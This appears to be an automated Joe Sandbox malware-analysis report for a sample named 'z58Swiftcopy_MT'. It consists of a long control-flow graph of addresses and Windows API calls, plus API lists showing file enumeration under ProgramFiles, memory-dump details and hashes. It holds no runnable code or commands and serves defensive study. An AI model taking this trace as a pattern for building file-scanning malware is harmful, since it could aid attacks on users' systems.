7736->7601 7738 33a73862 GetLastError 7737->7738 7739 33a7385f 7737->7739 7740 33a73b67 6 API calls 7738->7740 7739->7733 7741 33a73877 7740->7741 7742 33a738dc SetLastError 7741->7742 7743 33a73ba2 6 API calls 7741->7743 7748 33a73896 7741->7748 7742->7733 7745 33a73890 7743->7745 7744 33a738b8 7746 33a73ba2 6 API calls 7744->7746 7744->7748 7745->7744 7747 33a73ba2 6 API calls 7745->7747 7745->7748 7746->7748 7747->7744 7748->7742 7750 33a72485 7749->7750 7776 33a72933 IsProcessorFeaturePresent 7750->7776 7754 33a72496 7755 33a7249a 7754->7755 7787 33a753c8 7754->7787 7755->7607 7758 33a724b1 7758->7607 7759 33a73529 8 API calls 7759->7755 7818 33a724b5 7760->7818 7762 33a723e5 7762->7613 7763->7615 7767 33a746dc 7764->7767 7765 33a72ada 5 API calls 7766 33a71fad 7765->7766 7766->7606 7768 33a723b3 7766->7768 7767->7765 7769 33a723b8 7768->7769 7770 33a72933 IsProcessorFeaturePresent 7769->7770 7771 33a723c1 7769->7771 7770->7771 7771->7619 7773 33a7264e 7772->7773 7774 33a726f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7773->7774 7775 33a72744 7774->7775 7775->7612 7777 33a72491 7776->7777 7778 33a734ea 7777->7778 7779 33a734ef 7778->7779 7790 33a73936 7779->7790 7782 33a734fd 7782->7754 7784 33a73505 7785 33a73510 7784->7785 7786 33a73972 RtlDeleteCriticalSection 7784->7786 7785->7754 7786->7782 7814 33a77457 7787->7814 7791 33a7393f 7790->7791 7793 33a73968 7791->7793 7794 33a734f9 7791->7794 7804 33a73be0 7791->7804 7795 33a73972 RtlDeleteCriticalSection 7793->7795 7794->7782 7796 33a738e8 7794->7796 7795->7794 7809 33a73af1 7796->7809 7799 33a73ba2 6 API calls 7800 33a7390b 7799->7800 7801 33a73918 7800->7801 7802 33a7391b 6 API calls 7800->7802 7801->7784 7803 33a738fd 7802->7803 7803->7784 7805 33a73a82 5 API calls 7804->7805 7806 33a73bfa 7805->7806 7807 33a73c18 InitializeCriticalSectionAndSpinCount 7806->7807 7808 33a73c03 7806->7808 7807->7808 7808->7791 7810 33a73a82 5 API calls 7809->7810 7811 33a73b0b 7810->7811 7812 
33a73b24 TlsAlloc 7811->7812 7813 33a738f2 7811->7813 7813->7799 7813->7803 7817 33a77470 7814->7817 7815 33a72ada 5 API calls 7816 33a724a3 7815->7816 7816->7758 7816->7759 7817->7815 7819 33a724c4 7818->7819 7820 33a724c8 7818->7820 7819->7762 7821 33a72639 4 API calls 7820->7821 7823 33a724d5 7820->7823 7822 33a72559 7821->7822 7823->7762 7825 33a72451 7824->7825 7826 33a72455 7825->7826 7829 33a72461 7825->7829 7827 33a7527a 20 API calls 7826->7827 7828 33a7245f 7827->7828 7828->7629 7830 33a7246e 7829->7830 7831 33a7499b 28 API calls 7829->7831 7830->7629 7832 33a74bbd 7831->7832 7832->7629 7845 33a734c7 RtlInterlockedFlushSList 7833->7845 7835 33a72312 7835->7631 7847 33a7246f 7836->7847 7838 33a720c9 7838->7633 7840 33a72617 7839->7840 7841 33a7262d 7840->7841 7855 33a753ed 7840->7855 7841->7622 7844 33a73529 8 API calls 7844->7841 7846 33a734d7 7845->7846 7846->7835 7852 33a753ff 7847->7852 7850 33a7391b 6 API calls 7851 33a7354d 7850->7851 7851->7838 7853 33a75c2b 11 API calls 7852->7853 7854 33a72476 7853->7854 7854->7850 7858 33a774da 7855->7858 7860 33a774f3 7858->7860 7859 33a72ada 5 API calls 7861 33a72625 7859->7861 7860->7859 7861->7844 7475 33a78a89 7476 33a76d60 51 API calls 7475->7476 7477 33a78a8e 7476->7477 7059 33a75348 7062 33a73529 7059->7062 7063 33a73543 7062->7063 7064 33a73532 7062->7064 7070 33a7391b 7064->7070 7071 33a73925 7070->7071 7072 33a73537 7070->7072 7082 33a73b2c 7071->7082 7074 33a73972 7072->7074 7075 33a7353c 7074->7075 7076 33a7397d 7074->7076 7078 33a73c50 7075->7078 7077 33a73987 RtlDeleteCriticalSection 7076->7077 7077->7075 7077->7077 7079 33a73c59 7078->7079 7081 33a73c7f 7078->7081 7080 33a73c69 FreeLibrary 7079->7080 7079->7081 7080->7079 7081->7063 7087 33a73a82 7082->7087 7084 33a73b46 7085 33a73b5e TlsFree 7084->7085 7086 33a73b52 7084->7086 7085->7086 7086->7072 7088 33a73aaa 7087->7088 7092 33a73aa6 7087->7092 7088->7092 7093 33a739be 7088->7093 7091 33a73ac4 GetProcAddress 7091->7092 7092->7084 7094 33a739cd 
7093->7094 7095 33a739ea LoadLibraryExW 7094->7095 7097 33a73a60 FreeLibrary 7094->7097 7098 33a73a77 7094->7098 7099 33a73a38 LoadLibraryExW 7094->7099 7095->7094 7096 33a73a05 GetLastError 7095->7096 7096->7094 7097->7094 7098->7091 7098->7092 7099->7094 7100 33a77b48 7110 33a78ebf 7100->7110 7104 33a77b55 7123 33a7907c 7104->7123 7107 33a77b7f 7108 33a7571e 20 API calls 7107->7108 7109 33a77b8a 7108->7109 7127 33a78ec8 7110->7127 7112 33a77b50 7113 33a78fdc 7112->7113 7114 33a78fe8 7113->7114 7147 33a75671 RtlEnterCriticalSection 7114->7147 7116 33a7905e 7161 33a79073 7116->7161 7117 33a78ff3 7117->7116 7119 33a79032 RtlDeleteCriticalSection 7117->7119 7148 33a7a09c 7117->7148 7122 33a7571e 20 API calls 7119->7122 7120 33a7906a 7120->7104 7122->7117 7124 33a77b64 RtlDeleteCriticalSection 7123->7124 7125 33a79092 7123->7125 7124->7104 7124->7107 7125->7124 7126 33a7571e 20 API calls 7125->7126 7126->7124 7128 33a78ed4 7127->7128 7137 33a75671 RtlEnterCriticalSection 7128->7137 7130 33a78f77 7142 33a78f97 7130->7142 7133 33a78f83 7133->7112 7135 33a78ee3 7135->7130 7136 33a78e78 66 API calls 7135->7136 7138 33a77b94 RtlEnterCriticalSection 7135->7138 7139 33a78f6d 7135->7139 7136->7135 7137->7135 7138->7135 7145 33a77ba8 RtlLeaveCriticalSection 7139->7145 7141 33a78f75 7141->7135 7146 33a756b9 RtlLeaveCriticalSection 7142->7146 7144 33a78f9e 7144->7133 7145->7141 7146->7144 7147->7117 7149 33a7a0a8 7148->7149 7150 33a7a0ce 7149->7150 7151 33a7a0b9 7149->7151 7160 33a7a0c9 7150->7160 7164 33a77b94 RtlEnterCriticalSection 7150->7164 7152 33a76368 20 API calls 7151->7152 7153 33a7a0be 7152->7153 7155 33a762ac 26 API calls 7153->7155 7155->7160 7156 33a7a0ea 7165 33a7a026 7156->7165 7158 33a7a0f5 7181 33a7a112 7158->7181 7160->7117 7429 33a756b9 RtlLeaveCriticalSection 7161->7429 7163 33a7907a 7163->7120 7164->7156 7166 33a7a033 7165->7166 7167 33a7a048 7165->7167 7168 33a76368 20 API calls 7166->7168 7173 33a7a043 7167->7173 7184 33a78e12 7167->7184 7169 33a7a038 
7168->7169 7171 33a762ac 26 API calls 7169->7171 7171->7173 7173->7158 7174 33a7907c 20 API calls 7175 33a7a064 7174->7175 7190 33a77a5a 7175->7190 7177 33a7a06a 7197 33a7adce 7177->7197 7180 33a7571e 20 API calls 7180->7173 7428 33a77ba8 RtlLeaveCriticalSection 7181->7428 7183 33a7a11a 7183->7160 7185 33a78e2a 7184->7185 7186 33a78e26 7184->7186 7185->7186 7187 33a77a5a 26 API calls 7185->7187 7186->7174 7188 33a78e4a 7187->7188 7212 33a79a22 7188->7212 7191 33a77a66 7190->7191 7192 33a77a7b 7190->7192 7193 33a76368 20 API calls 7191->7193 7192->7177 7194 33a77a6b 7193->7194 7195 33a762ac 26 API calls 7194->7195 7196 33a77a76 7195->7196 7196->7177 7198 33a7addd 7197->7198 7200 33a7adf2 7197->7200 7199 33a76355 20 API calls 7198->7199 7203 33a7ade2 7199->7203 7201 33a7ae2d 7200->7201 7206 33a7ae19 7200->7206 7202 33a76355 20 API calls 7201->7202 7204 33a7ae32 7202->7204 7205 33a76368 20 API calls 7203->7205 7208 33a76368 20 API calls 7204->7208 7209 33a7a070 7205->7209 7385 33a7ada6 7206->7385 7210 33a7ae3a 7208->7210 7209->7173 7209->7180 7211 33a762ac 26 API calls 7210->7211 7211->7209 7213 33a79a2e 7212->7213 7214 33a79a36 7213->7214 7215 33a79a4e 7213->7215 7237 33a76355 7214->7237 7216 33a79aec 7215->7216 7221 33a79a83 7215->7221 7219 33a76355 20 API calls 7216->7219 7222 33a79af1 7219->7222 7220 33a76368 20 API calls 7234 33a79a43 7220->7234 7240 33a78c7b RtlEnterCriticalSection 7221->7240 7224 33a76368 20 API calls 7222->7224 7226 33a79af9 7224->7226 7225 33a79a89 7227 33a79aa5 7225->7227 7228 33a79aba 7225->7228 7229 33a762ac 26 API calls 7226->7229 7230 33a76368 20 API calls 7227->7230 7241 33a79b0d 7228->7241 7229->7234 7233 33a79aaa 7230->7233 7232 33a79ab5 7292 33a79ae4 7232->7292 7235 33a76355 20 API calls 7233->7235 7234->7186 7235->7232 7238 33a75b7a 20 API calls 7237->7238 7239 33a7635a 7238->7239 7239->7220 7240->7225 7242 33a79b3b 7241->7242 7280 33a79b34 7241->7280 7243 33a79b3f 7242->7243 7244 33a79b5e 7242->7244 7246 33a76355 20 API calls 
7243->7246 7247 33a79baf 7244->7247 7248 33a79b92 7244->7248 7245 33a72ada 5 API calls 7249 33a79d15 7245->7249 7250 33a79b44 7246->7250 7252 33a79bc5 7247->7252 7295 33a7a00b 7247->7295 7251 33a76355 20 API calls 7248->7251 7249->7232 7253 33a76368 20 API calls 7250->7253 7255 33a79b97 7251->7255 7298 33a796b2 7252->7298 7257 33a79b4b 7253->7257 7260 33a76368 20 API calls 7255->7260 7258 33a762ac 26 API calls 7257->7258 7258->7280 7263 33a79b9f 7260->7263 7261 33a79bd3 7264 33a79bd7 7261->7264 7265 33a79bf9 7261->7265 7262 33a79c0c 7267 33a79c66 WriteFile 7262->7267 7268 33a79c20 7262->7268 7266 33a762ac 26 API calls 7263->7266 7269 33a79ccd 7264->7269 7305 33a79645 7264->7305 7310 33a79492 GetConsoleCP 7265->7310 7266->7280 7271 33a79c89 GetLastError 7267->7271 7278 33a79bef 7267->7278 7272 33a79c56 7268->7272 7273 33a79c28 7268->7273 7269->7280 7281 33a76368 20 API calls 7269->7281 7271->7278 7336 33a79728 7272->7336 7274 33a79c46 7273->7274 7275 33a79c2d 7273->7275 7328 33a798f5 7274->7328 7275->7269 7321 33a79807 7275->7321 7278->7269 7278->7280 7284 33a79ca9 7278->7284 7280->7245 7283 33a79cf2 7281->7283 7287 33a76355 20 API calls 7283->7287 7285 33a79cc4 7284->7285 7286 33a79cb0 7284->7286 7343 33a76332 7285->7343 7288 33a76368 20 API calls 7286->7288 7287->7280 7290 33a79cb5 7288->7290 7291 33a76355 20 API calls 7290->7291 7291->7280 7384 33a78c9e RtlLeaveCriticalSection 7292->7384 7294 33a79aea 7294->7234 7348 33a79f8d 7295->7348 7370 33a78dbc 7298->7370 7300 33a796c2 7301 33a796c7 7300->7301 7302 33a75af6 38 API calls 7300->7302 7301->7261 7301->7262 7303 33a796ea 7302->7303 7303->7301 7304 33a79708 GetConsoleMode 7303->7304 7304->7301 7308 33a7969f 7305->7308 7309 33a7966a 7305->7309 7306 33a796a1 GetLastError 7306->7308 7307 33a7a181 WriteConsoleW CreateFileW 7307->7309 7308->7278 7309->7306 7309->7307 7309->7308 7311 33a794f5 7310->7311 7320 33a79607 7310->7320 7315 33a7957b WideCharToMultiByte 7311->7315 7317 33a779e6 40 API calls 7311->7317 7319 
33a795d2 WriteFile 7311->7319 7311->7320 7379 33a77c19 7311->7379 7312 33a72ada 5 API calls 7314 33a79641 7312->7314 7314->7278 7316 33a795a1 WriteFile 7315->7316 7315->7320 7316->7311 7318 33a7962a GetLastError 7316->7318 7317->7311 7318->7320 7319->7311 7319->7318 7320->7312 7322 33a79816 7321->7322 7323 33a798d8 7322->7323 7325 33a79894 WriteFile 7322->7325 7324 33a72ada 5 API calls 7323->7324 7326 33a798f1 7324->7326 7325->7322 7327 33a798da GetLastError 7325->7327 7326->7278 7327->7323 7335 33a79904 7328->7335 7329 33a79a0f 7330 33a72ada 5 API calls 7329->7330 7331 33a79a1e 7330->7331 7331->7278 7332 33a79986 WideCharToMultiByte 7333 33a79a07 GetLastError 7332->7333 7334 33a799bb WriteFile 7332->7334 7333->7329 7334->7333 7334->7335 7335->7329 7335->7332 7335->7334 7337 33a79737 7336->7337 7338 33a797ea 7337->7338 7340 33a797a9 WriteFile 7337->7340 7339 33a72ada 5 API calls 7338->7339 7341 33a79803 7339->7341 7340->7337 7342 33a797ec GetLastError 7340->7342 7341->7278 7342->7338 7344 33a76355 20 API calls 7343->7344 7345 33a7633d 7344->7345 7346 33a76368 20 API calls 7345->7346 7347 33a76350 7346->7347 7347->7280 7357 33a78d52 7348->7357 7350 33a79f9f 7351 33a79fa7 7350->7351 7352 33a79fb8 SetFilePointerEx 7350->7352 7353 33a76368 20 API calls 7351->7353 7354 33a79fd0 GetLastError 7352->7354 7355 33a79fac 7352->7355 7353->7355 7356 33a76332 20 API calls 7354->7356 7355->7252 7356->7355 7358 33a78d74 7357->7358 7359 33a78d5f 7357->7359 7361 33a76355 20 API calls 7358->7361 7363 33a78d99 7358->7363 7360 33a76355 20 API calls 7359->7360 7362 33a78d64 7360->7362 7364 33a78da4 7361->7364 7365 33a76368 20 API calls 7362->7365 7363->7350 7366 33a76368 20 API calls 7364->7366 7367 33a78d6c 7365->7367 7368 33a78dac 7366->7368 7367->7350 7369 33a762ac 26 API calls 7368->7369 7369->7367 7371 33a78dd6 7370->7371 7372 33a78dc9 7370->7372 7374 33a76368 20 API calls 7371->7374 7376 33a78de2 7371->7376 7373 33a76368 20 API calls 7372->7373 7375 33a78dce 7373->7375 7377 
33a78e03 7374->7377 7375->7300 7376->7300 7378 33a762ac 26 API calls 7377->7378 7378->7375 7380 33a75af6 38 API calls 7379->7380 7381 33a77c24 7380->7381 7382 33a77a00 38 API calls 7381->7382 7383 33a77c34 7382->7383 7383->7311 7384->7294 7388 33a7ad24 7385->7388 7387 33a7adca 7387->7209 7389 33a7ad30 7388->7389 7399 33a78c7b RtlEnterCriticalSection 7389->7399 7391 33a7ad3e 7392 33a7ad65 7391->7392 7393 33a7ad70 7391->7393 7400 33a7ae4d 7392->7400 7395 33a76368 20 API calls 7393->7395 7396 33a7ad6b 7395->7396 7415 33a7ad9a 7396->7415 7398 33a7ad8d 7398->7387 7399->7391 7401 33a78d52 26 API calls 7400->7401 7403 33a7ae5d 7401->7403 7402 33a7ae63 7418 33a78cc1 7402->7418 7403->7402 7405 33a7ae95 7403->7405 7408 33a78d52 26 API calls 7403->7408 7405->7402 7406 33a78d52 26 API calls 7405->7406 7409 33a7aea1 CloseHandle 7406->7409 7411 33a7ae8c 7408->7411 7409->7402 7413 33a7aead GetLastError 7409->7413 7410 33a7aedd 7410->7396 7412 33a78d52 26 API calls 7411->7412 7412->7405 7413->7402 7414 33a76332 20 API calls 7414->7410 7427 33a78c9e RtlLeaveCriticalSection 7415->7427 7417 33a7ada4 7417->7398 7419 33a78d37 7418->7419 7420 33a78cd0 7418->7420 7421 33a76368 20 API calls 7419->7421 7420->7419 7426 33a78cfa 7420->7426 7422 33a78d3c 7421->7422 7423 33a76355 20 API calls 7422->7423 7424 33a78d27 7423->7424 7424->7410 7424->7414 7425 33a78d21 SetStdHandle 7425->7424 7426->7424 7426->7425 7427->7417 7428->7183 7429->7163 7482 33a74ed7 7483 33a76d60 51 API calls 7482->7483 7484 33a74ee9 7483->7484 7493 33a77153 GetEnvironmentStringsW 7484->7493 7487 33a74ef4 7489 33a7571e 20 API calls 7487->7489 7490 33a74f29 7489->7490 7491 33a74eff 7492 33a7571e 20 API calls 7491->7492 7492->7487 7494 33a7716a 7493->7494 7495 33a771bd 7493->7495 7498 33a77170 WideCharToMultiByte 7494->7498 7496 33a771c6 FreeEnvironmentStringsW 7495->7496 7497 33a74eee 7495->7497 7496->7497 7497->7487 7505 33a74f2f 7497->7505 7498->7495 7499 33a7718c 7498->7499 7500 33a756d0 21 API calls 7499->7500 7501 
33a77192 7500->7501 7502 33a771af 7501->7502 7503 33a77199 WideCharToMultiByte 7501->7503 7504 33a7571e 20 API calls 7502->7504 7503->7502 7504->7495 7506 33a74f44 7505->7506 7507 33a7637b 20 API calls 7506->7507 7517 33a74f6b 7507->7517 7508 33a74fcf 7509 33a7571e 20 API calls 7508->7509 7510 33a74fe9 7509->7510 7510->7491 7511 33a7637b 20 API calls 7511->7517 7512 33a74fd1 7514 33a75000 20 API calls 7512->7514 7515 33a74fd7 7514->7515 7518 33a7571e 20 API calls 7515->7518 7516 33a74ff3 7519 33a762bc 11 API calls 7516->7519 7517->7508 7517->7511 7517->7512 7517->7516 7520 33a7571e 20 API calls 7517->7520 7522 33a7544d 7517->7522 7518->7508 7521 33a74fff 7519->7521 7520->7517 7523 33a75468 7522->7523 7524 33a7545a 7522->7524 7525 33a76368 20 API calls 7523->7525 7524->7523 7529 33a7547f 7524->7529 7526 33a75470 7525->7526 7527 33a762ac 26 API calls 7526->7527 7528 33a7547a 7527->7528 7528->7517 7529->7528 7530 33a76368 20 API calls 7529->7530 7530->7526 6495 33a773d5 6496 33a773e1 6495->6496 6507 33a75671 RtlEnterCriticalSection 6496->6507 6498 33a773e8 6508 33a78be3 6498->6508 6500 33a773f7 6506 33a77406 6500->6506 6521 33a77269 GetStartupInfoW 6500->6521 6504 33a77417 6532 33a77422 6506->6532 6507->6498 6509 33a78bef 6508->6509 6510 33a78c13 6509->6510 6511 33a78bfc 6509->6511 6535 33a75671 RtlEnterCriticalSection 6510->6535 6512 33a76368 20 API calls 6511->6512 6514 33a78c01 6512->6514 6515 33a762ac 26 API calls 6514->6515 6516 33a78c0b 6515->6516 6516->6500 6517 33a78c4b 6543 33a78c72 6517->6543 6519 33a78c1f 6519->6517 6536 33a78b34 6519->6536 6522 33a77286 6521->6522 6523 33a77318 6521->6523 6522->6523 6524 33a78be3 27 API calls 6522->6524 6527 33a7731f 6523->6527 6525 33a772af 6524->6525 6525->6523 6526 33a772dd GetFileType 6525->6526 6526->6525 6528 33a77326 6527->6528 6529 33a77369 GetStdHandle 6528->6529 6530 33a773d1 6528->6530 6531 33a7737c GetFileType 6528->6531 6529->6528 6530->6506 6531->6528 6554 33a756b9 RtlLeaveCriticalSection 6532->6554 6534 
33a77429 6534->6504 6535->6519 6537 33a7637b 20 API calls 6536->6537 6538 33a78b46 6537->6538 6542 33a78b53 6538->6542 6546 33a75eb7 6538->6546 6539 33a7571e 20 API calls 6540 33a78ba5 6539->6540 6540->6519 6542->6539 6553 33a756b9 RtlLeaveCriticalSection 6543->6553 6545 33a78c79 6545->6516 6547 33a75c45 5 API calls 6546->6547 6548 33a75ede 6547->6548 6549 33a75efc InitializeCriticalSectionAndSpinCount 6548->6549 6550 33a75ee7 6548->6550 6549->6550 6551 33a72ada 5 API calls 6550->6551 6552 33a75f13 6551->6552 6552->6538 6553->6545 6554->6534 7430 33a75351 7431 33a75360 7430->7431 7432 33a75374 7430->7432 7431->7432 7435 33a7571e 20 API calls 7431->7435 7433 33a7571e 20 API calls 7432->7433 7434 33a75386 7433->7434 7436 33a7571e 20 API calls 7434->7436 7435->7432 7437 33a75399 7436->7437 7438 33a7571e 20 API calls 7437->7438 7439 33a753aa 7438->7439 7440 33a7571e 20 API calls 7439->7440 7441 33a753bb 7440->7441 7478 33a73c90 RtlUnwind 7531 33a736d0 7532 33a736e2 7531->7532 7534 33a736f0 7531->7534 7533 33a72ada 5 API calls 7532->7533 7533->7534 6555 33a74bdd 6556 33a74bec 6555->6556 6557 33a74c08 6555->6557 6556->6557 6558 33a74bf2 6556->6558 6578 33a76d60 6557->6578 6560 33a76368 20 API calls 6558->6560 6562 33a74bf7 6560->6562 6564 33a762ac 26 API calls 6562->6564 6563 33a74c33 6582 33a74d01 6563->6582 6565 33a74c01 6564->6565 6568 33a74e76 20 API calls 6569 33a74c5d 6568->6569 6570 33a74c66 6569->6570 6571 33a74c72 6569->6571 6572 33a76368 20 API calls 6570->6572 6573 33a74d01 38 API calls 6571->6573 6577 33a74c6b 6572->6577 6575 33a74c88 6573->6575 6574 33a7571e 20 API calls 6574->6565 6576 33a7571e 20 API calls 6575->6576 6575->6577 6576->6577 6577->6574 6579 33a74c0f GetModuleFileNameA 6578->6579 6580 33a76d69 6578->6580 6579->6563 6588 33a76c5f 6580->6588 6584 33a74d26 6582->6584 6586 33a74d86 6584->6586 6953 33a770eb 6584->6953 6585 33a74c50 6585->6568 6586->6585 6587 33a770eb 38 API calls 6586->6587 6587->6586 6608 33a75af6 GetLastError 6588->6608 6590 
33a76c6c 6628 33a76d7e 6590->6628 6592 33a76c74 6637 33a769f3 6592->6637 6595 33a76c8b 6595->6579 6596 33a756d0 21 API calls 6597 33a76c9c 6596->6597 6603 33a76cce 6597->6603 6644 33a76e20 6597->6644 6600 33a7571e 20 API calls 6600->6595 6601 33a76cc9 6602 33a76368 20 API calls 6601->6602 6602->6603 6603->6600 6604 33a76ce6 6605 33a76d12 6604->6605 6606 33a7571e 20 API calls 6604->6606 6605->6603 6654 33a768c9 6605->6654 6606->6605 6609 33a75b0c 6608->6609 6610 33a75b12 6608->6610 6611 33a75e08 11 API calls 6609->6611 6612 33a7637b 20 API calls 6610->6612 6614 33a75b61 SetLastError 6610->6614 6611->6610 6613 33a75b24 6612->6613 6615 33a75e5e 11 API calls 6613->6615 6619 33a75b2c 6613->6619 6614->6590 6616 33a75b41 6615->6616 6616->6619 6620 33a75b48 6616->6620 6617 33a7571e 20 API calls 6618 33a75b32 6617->6618 6621 33a75b6d SetLastError 6618->6621 6619->6617 6622 33a7593c 20 API calls 6620->6622 6657 33a755a8 6621->6657 6623 33a75b53 6622->6623 6625 33a7571e 20 API calls 6623->6625 6627 33a75b5a 6625->6627 6627->6614 6627->6621 6629 33a76d8a 6628->6629 6630 33a75af6 38 API calls 6629->6630 6635 33a76d94 6630->6635 6632 33a76e18 6632->6592 6634 33a755a8 38 API calls 6634->6635 6635->6632 6635->6634 6636 33a7571e 20 API calls 6635->6636 6806 33a75671 RtlEnterCriticalSection 6635->6806 6807 33a76e0f 6635->6807 6636->6635 6811 33a754a7 6637->6811 6640 33a76a26 6642 33a76a2b GetACP 6640->6642 6643 33a76a3d 6640->6643 6641 33a76a14 GetOEMCP 6641->6643 6642->6643 6643->6595 6643->6596 6645 33a769f3 40 API calls 6644->6645 6646 33a76e3f 6645->6646 6649 33a76e90 IsValidCodePage 6646->6649 6651 33a76e46 6646->6651 6653 33a76eb5 6646->6653 6647 33a72ada 5 API calls 6648 33a76cc1 6647->6648 6648->6601 6648->6604 6650 33a76ea2 GetCPInfo 6649->6650 6649->6651 6650->6651 6650->6653 6651->6647 6844 33a76acb GetCPInfo 6653->6844 6917 33a76886 6654->6917 6656 33a768ed 6656->6603 6668 33a77613 6657->6668 6660 33a755b8 6662 33a755c2 IsProcessorFeaturePresent 6660->6662 6667 33a755e0 
6660->6667 6663 33a755cd 6662->6663 6665 33a760e2 8 API calls 6663->6665 6665->6667 6698 33a74bc1 6667->6698 6701 33a77581 6668->6701 6671 33a7766e 6672 33a7767a 6671->6672 6673 33a75b7a 20 API calls 6672->6673 6677 33a776a7 6672->6677 6680 33a776a1 6672->6680 6673->6680 6674 33a776f3 6676 33a76368 20 API calls 6674->6676 6675 33a776d6 6724 33a7bdc9 6675->6724 6678 33a776f8 6676->6678 6684 33a7771f 6677->6684 6715 33a75671 RtlEnterCriticalSection 6677->6715 6681 33a762ac 26 API calls 6678->6681 6680->6674 6680->6675 6680->6677 6681->6675 6686 33a7777e 6684->6686 6688 33a77776 6684->6688 6696 33a777a9 6684->6696 6716 33a756b9 RtlLeaveCriticalSection 6684->6716 6686->6696 6717 33a77665 6686->6717 6689 33a74bc1 28 API calls 6688->6689 6689->6686 6691 33a7780c 6691->6675 6697 33a75af6 38 API calls 6691->6697 6693 33a75af6 38 API calls 6693->6691 6695 33a77665 38 API calls 6695->6696 6720 33a7782e 6696->6720 6697->6675 6728 33a7499b 6698->6728 6704 33a77527 6701->6704 6703 33a755ad 6703->6660 6703->6671 6705 33a77533 6704->6705 6710 33a75671 RtlEnterCriticalSection 6705->6710 6707 33a77541 6711 33a77575 6707->6711 6709 33a77568 6709->6703 6710->6707 6714 33a756b9 RtlLeaveCriticalSection 6711->6714 6713 33a7757f 6713->6709 6714->6713 6715->6684 6716->6688 6718 33a75af6 38 API calls 6717->6718 6719 33a7766a 6718->6719 6719->6695 6721 33a77834 6720->6721 6722 33a777fd 6720->6722 6727 33a756b9 RtlLeaveCriticalSection 6721->6727 6722->6675 6722->6691 6722->6693 6725 33a72ada 5 API calls 6724->6725 6726 33a7bdd4 6725->6726 6726->6726 6727->6722 6729 33a749a7 6728->6729 6730 33a749bf 6729->6730 6750 33a74af5 GetModuleHandleW 6729->6750 6759 33a75671 RtlEnterCriticalSection 6730->6759 6734 33a74a65 6767 33a74aa5 6734->6767 6737 33a749c7 6737->6734 6739 33a74a3c 6737->6739 6760 33a7527a 6737->6760 6740 33a74a54 6739->6740 6763 33a74669 6739->6763 6745 33a74669 5 API calls 6740->6745 6741 33a74a82 6770 33a74ab4 6741->6770 6742 33a74aae 6743 33a7bdc9 5 API calls 6742->6743 6748 
33a74ab3 6743->6748 6745->6734 6751 33a749b3 6750->6751 6751->6730 6752 33a74b39 GetModuleHandleExW 6751->6752 6753 33a74b63 GetProcAddress 6752->6753 6754 33a74b78 6752->6754 6753->6754 6755 33a74b95 6754->6755 6756 33a74b8c FreeLibrary 6754->6756 6757 33a72ada 5 API calls 6755->6757 6756->6755 6758 33a74b9f 6757->6758 6758->6730 6759->6737 6778 33a75132 6760->6778 6765 33a74698 6763->6765 6764 33a72ada 5 API calls 6766 33a746c1 6764->6766 6765->6764 6766->6740 6799 33a756b9 RtlLeaveCriticalSection 6767->6799 6769 33a74a7e 6769->6741 6769->6742 6800 33a76025 6770->6800 6773 33a74ae2 6776 33a74b39 8 API calls 6773->6776 6774 33a74ac2 GetPEB 6774->6773 6775 33a74ad2 GetCurrentProcess TerminateProcess 6774->6775 6775->6773 6777 33a74aea ExitProcess 6776->6777 6781 33a750e1 6778->6781 6780 33a75156 6780->6739 6782 33a750ed 6781->6782 6789 33a75671 RtlEnterCriticalSection 6782->6789 6784 33a750fb 6790 33a7515a 6784->6790 6788 33a75119 6788->6780 6789->6784 6793 33a7517a 6790->6793 6794 33a75182 6790->6794 6791 33a72ada IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6792 33a75108 6791->6792 6796 33a75126 6792->6796 6793->6791 6794->6793 6795 33a7571e 20 API calls 6794->6795 6795->6793 6797 33a756b9 RtlLeaveCriticalSection 6796->6797 6798 33a75130 6797->6798 6798->6788 6799->6769 6801 33a76040 6800->6801 6802 33a7604a 6800->6802 6804 33a72ada 5 API calls 6801->6804 6803 33a75c45 5 API calls 6802->6803 6803->6801 6805 33a74abe 6804->6805 6805->6773 6805->6774 6806->6635 6810 33a756b9 RtlLeaveCriticalSection 6807->6810 6809 33a76e16 6809->6635 6810->6809 6812 33a754c4 6811->6812 6818 33a754ba 6811->6818 6813 33a75af6 38 API calls 6812->6813 6812->6818 6814 33a754e5 6813->6814 6819 33a77a00 6814->6819 6818->6640 6818->6641 6820 33a77a13 6819->6820 6821 33a754fe 6819->6821 6820->6821 6827 33a77f0f 6820->6827 6823 33a77a2d 6821->6823 6824 33a77a55 6823->6824 6825 33a77a40 6823->6825 6824->6818 6825->6824 6826 

Control-flow Graph

APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 33A71137
• lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33A71151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A7115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A7116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A7117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33A71193
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 33A711D0
• FindClose.KERNEL32(00000000), ref: 33A711DB
Memory Dump Source
• Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
• Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: fcb0e12b1f5841b3526bbf1b0f49a29c0375735733d8ba495bcc66e1c1dd1be0
• Instruction ID: 5f3a66660f6f723d429595a9d74ac8b79175051612e1a1b8b5c3f0c742a0146e
• Opcode Fuzzy Hash: fcb0e12b1f5841b3526bbf1b0f49a29c0375735733d8ba495bcc66e1c1dd1be0
• Instruction Fuzzy Hash: A52182729043486BD720EAA4DC8CF9B7BDCEF84314F04092EF959D7190EB71D64A8796

Control-flow Graph

APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 33A71434
  • Part of subcall function 33A710F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 33A71137
  • Part of subcall function 33A710F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33A71151
